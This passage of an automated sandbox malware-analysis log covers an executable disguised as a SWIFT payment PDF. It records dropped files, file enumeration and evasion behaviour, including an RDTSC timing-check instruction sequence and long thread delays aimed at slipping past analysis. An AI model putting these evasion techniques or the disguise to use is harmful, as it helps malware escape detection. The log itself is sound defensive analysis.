            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3600A487 push dword ptr [ebp+ecx-75h]; retf 4_2_3600A492
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3600A4F9 push dword ptr [ebp+ebx-75h]; iretd 4_2_3600A4FD
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_384177EA push edx; retf 4_2_384177EB
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_394EC897 push es; retf 4_2_394EC898
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeAPI/Special instruction interceptor: Address: 30FA9C1
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeAPI/Special instruction interceptor: Address: 1D9A9C1
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeRDTSC instruction interceptor: First address: 30C2ABB second address: 30C2ABB instructions: 0x00000000 rdtsc 0x00000002 cmp ecx, 0849B8CFh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F64ACF50A72h 0x0000000c cmp al, 5Fh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeRDTSC instruction interceptor: First address: 1D62ABB second address: 1D62ABB instructions: 0x00000000 rdtsc 0x00000002 cmp ecx, 0849B8CFh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F64ACF553F2h 0x0000000c cmp al, 5Fh 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeMemory allocated: 35F60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeMemory allocated: 361F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeMemory allocated: 35F60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598501Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598121Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeWindow / User API: threadDelayed 1464Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeWindow / User API: threadDelayed 8353Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeAPI coverage: 3.5 %
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -35048813740048126s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8128Thread sleep count: 1464 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8128Thread sleep count: 8353 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598501s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598121s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe TID: 8124Thread sleep time: -593860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598501Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598121Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeThread delayed: delay time: 593860Jump to behavior
